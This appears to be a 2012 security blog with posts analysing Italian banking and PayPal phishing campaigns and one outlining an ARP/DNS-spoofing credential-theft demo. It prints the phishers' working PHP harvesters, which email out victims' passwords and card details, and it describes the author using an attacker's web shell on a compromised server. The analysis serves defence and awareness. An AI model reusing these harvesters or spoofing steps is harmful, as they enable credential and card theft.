Monday, April 23, 2012

CartaSi phishing email part 2/2

Behind this phishing emails there are several people or just one guy ?

What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.


Where is he from ?

His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.

I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf   (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.


The emails address are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.

When a victim click on the link will be redirected to this fake page on this site.


Once logged in



Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="





Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
Città $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");

He did a good job to replicate paypal login process.

In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.

Folder index file.


Folder content.


That's all for now.

Friday, April 20, 2012

Poste Italiane phishing emails 2

In this hours a "new" phishing attack is targetting Poste Italiane and his service called Postepay. In the previous article regarding poste italiane phishing email the phiser to convince the victim to send their account details said that they won a bonus of 250 euro.

This time he chose another way that is more credible (in my opinion).


The title says we detected irregular activity on your Poste Italiane account and the content proceed for your protection you must download the attachment and fill the form. If you ignore this email your account will be temporarily suspended.

The sender is support@update.com

When you open the attachment you get this page with a central form ready to be filled with postepay account details (Username, Password, Credit Card Number, Expiration Date, Security Code).


In this file he haven't tried to obfuscated the form code as he did last time, so the address of the server where the data will be sent is easily visible.


This server is located in Poland and the ISP is Netia S.A.


There aren't domains that point to this ip address.


The server is running a copy of Windows Server 2003 with Apache2Triad which is a sort of WAMP only that the project is a dead since 2009. If you browse to this address the index page will look like this.


He created an index that doesn't list the other files on the server. As you can image sobo.php script collect the stolen data, save this information in a txt file or send an email to the phisher and at the end redirect the victim to the original site. What will be its content ?

Downloaded with wget, so no php: index page

I was expecting to see a meta tag or nothing, instead i found a copy of Poste Italiane website. Here it is a screenshot posted on PhishTank.

Maybe this mean that he started redirecting the victims to this site and then stole the information, now he sends an attachment.

That's all for now.

Thursday, April 19, 2012

ARP/DNS Spoofing Steal Facebook Password (LAN Environment)

In this video i'll show you how an attacker can steal user credentials of every site (in this case will be facebook) in a LAN environment. First of all we use SET to clone the current facebook home page and setup a server listening on port 80 with that copy.

Next step is to discover potential victims mapping our network. There are tons of ways to do this through nmap, hping,  ping command, but this time i used the linux command arp-scan with the following syntax:


After mapping the network i used a great tool called netcmd  to perform an arp spoofing attack to redirect traffic through the attacker.


Last step is to perform a dns spoofing attack so all request sent by the victim to facebook.com will be redirected to the attacker. To do this we need to use ettercap and modify /usr/share/ettercap/etter.dns adding this two lines.


After lunched ettercap we have just to wait for the victim to login into his facebook account.



Enjoy the video.

Sunday, April 15, 2012

CartaSi phising email part 1/2

CartaSi is a credit/charge card and can be used in Italy and abroad.

The 31st of March i received an email from CartaSi_Informa@cartasi.it.


It is a classic phishing email and it says to download the attachment in order to unlock your account. One strange thing are the two cyrillic words at the end, maybe this text has been translated from russian/ucrainan by someone because there aren't mistakes and they forgot the two letters.

Why they haven't better controlled before sending ?

The italian missing letters are è and ù that are with accent, so maybe this is a fail encoding by hotmail or the software that they used to send the email.

By the way phishers have used a creadible domain name (cartasi.it), which is the original. The attachment to download has name "CartaSi Secure Department" and if you open with a browser will look like this:


Here it is the original.


Opening the attachment with a text editor we can see where the stolen data will be redirected, but also this time the initial FORM tag is encoded.


Once decoded we get this.


Let's analyze the domain with a whois service.

Domain details:
  • Registered: 7 September 2011
  • Exipres: 7 September 2012
  • Registrar of record:  TUCOWS, INC.
  • Record last update: 23 March 2012 
Others details are omitted.

Right now the homepage is a blank page but i found a cached page taken the 15th of March by google's crawlers.


This was a legit website running wordpress cms and throught one of his/plugin flaws the phishers were able to upload a shell. The shel folder hasn't an index file and it hasn't an .httaccess to prevent directory listing so here it is the content.
As you can see there are several files but the most important are cartasi.txt and go1.php. The php file stores stolen information into cartasi.txt and maybe does others things. 


Neither pastote folder hasn't a proper htaccess file but has an index.php file. His mistake was to name the file with an initial uppercase letter so all files are listed.


The funniest thing is that pollo.php is a c99 shell,  abc.php is an "evilc0der v. edition ADVANCED!" shell, both with no password protection, so everyone can use it to download, upload and do others things. I used a shell to download go1.php to see what this script does other than append stolen information to cartasi.txt and redirect to http://www.bancopostaclik.it/mc_securcode.shtml.

Here it is the code.
$username = $_POST['loginx'];
$password = $_POST['passwdx'];
$name     = $_POST['name'];
$ccnumb   = $_POST['ccnumb'];
$month    = $_POST['month'];
$year     = $_POST['year'];
$cvv      = $_POST['cvv2'];
$condice  = $_POST['condice'];
$name     = $_POST['name'];
$email    = $_POST['email'];
$pswmail  = $_POST['pswmail'];
$dsecure  = $_POST['3dsecure'];
$ip        = getenv("REMOTE_ADDR");
$datamasii = date("D M d, Y g:i a");


$message .=".............................................\n";
$message .="Username : $username\n";
$message .="Password : $password\n";
$message .="Full Name: $name\n";
$message .="CCNumber : $ccnumb\n";
$message .="Exp      : $month/$year\n";
$message .="Cvv2     : $cvv\n";
$message .="3D Secure: $dsecure\n";
$message .="CFiscal  : $condice\n";
$message .="Mail     : $email\n";
$message .="Pasw     : $pswmail\n";
$message .="Date     : $datamasii \n";
$message .="..............................................\n";
$message .="©IP $ip\n";

$subject = " CartaSi ";
$file = fopen("cartasi.txt", "a");
fputs ($file, "$message\r\n");
fclose ($file);
mail("--snip--@fastwebmail.it",$subject,$message);

header("Location: http://www.cartasi.it/gtwpages/common/index.jsp?id=HgSgFKmncL");
The other thing is send an email to a fastweb email. Fastweb is an Italian broadband telecommunications company and it provides voice, Internet, cable television, IPTV services. His email are provided with a contract and this mean two things:
  1. Phisher have hacked an email of an user
  2. It is his own email.
That's it, in the next part i will examinate all other files.

Friday, April 6, 2012

Poste Italiane phishing emails

Poste italiane is the government-owned postal service of Italy and spammers use phishing techniques to trick people to send their credentials of online accounts and credit cards.

The first of april i received an email from bancoposta@bpolbpol.com with this content.


Basically it says that i have been selected to get a bonus of 250 euro and in order to complete the operation i must download the attachment.

First of all we see that the domain of the sender is neither poste.it or postepay.it, this is kinda strange to be a legitimate email. I was curious to know the type of site behind the domain so i navigate to that url and i get a white screen with a blue write "website under construction".


Maybe we can get more information checking throgh http://whois.domaintools.com who registered that domain.

Few details:
  • Record created: 2/7/2011
  • Record expires: 2/7/2012.
  • Registration service provider: Aruba S.p.A. 
Others details are omitted, because contains owner personal information.

The strange think about this website is that it has never been linked or added to google, so no one can find it throught a search engine. Since it's not linked i cannot search for a chaced page, consequently i cannot know what type of website was running.

We take a brief look to nslookup and we discover that has its own mail server.


Since we cannot know if this site was operable i can say that the smtp server was used to spread spam without the owner's knowledge.

Now it's time to see what is the attachment. It's a simple html file called Document.html and if you open with a browser you get a postepay page with a central form where are listed different fields such as username,  password, credit card number, expiration date and security code ready to be filled.


As you can see it looks very similar to the original, they did a pretty good job.


One thing to notice is the year of expiration date that still use 2011, this mean that the html page was created the past year and they haven't updated yet.


Where are sent this information ?

To find out we open our fake page with an editor like notepad++ and there are two lines, one regarding the copyright and the other one is kinda funny because tell you that the source code is not available.


If you scroll down you see at the end of the page there are few lines of html with obfuscated javascript


The code has been converted from ASCII to hexadecimal and to reverse the process it uses a javascript function called unescape.

Once decoded the most important thing to do was to find the "collector site" that must be the value of  the action attribute of form tag.


The downloaded page will perform a POST request to gogeamitu.com/soso/system.php with all the sensitive information. This php script can act in several ways, but what i think is it can do one of this things:
  • Stores the information in the database of the same server
  • Send the information to a remote database or to another web page
  • Send an email to spammers with all information 

To know if this site has been compromised or is the server of the spammer we take a look to the domain through a whois service (like the previous).

Domain details:
  • Record created 21 February 2012
  • Record expire 21 February 2013
  • Registration service provider: Aruba S.p.A.
Again some details are omitted and also in this case the owner details are fully visible. This domain has been registered only one month ago but this time is linked so i can check the webchace of various search engines.

Current home page.


I found the cached page only on google and was taken the 28 of march, this is too far from the register date to say that has never been chaged. Another interesting thing is the domain name gogeamitu which is the name of an old Romanian boxer Gogea Mitu, maybe this is a clue about spammers nationality ?

Visible content of system.php is down here and it is composed by only one line that redirect the victim to poste.it.


In my opinion spammers have payed one person to use his personal information to register gogeamitu and store (*) in this server all victims details, maybe once a day they retrieve the data and clean the db.

* After doing other reasearch on others phishing emails he (i'm quite sure is only one person) doesn't store the information to the db, but send an email to his personal address.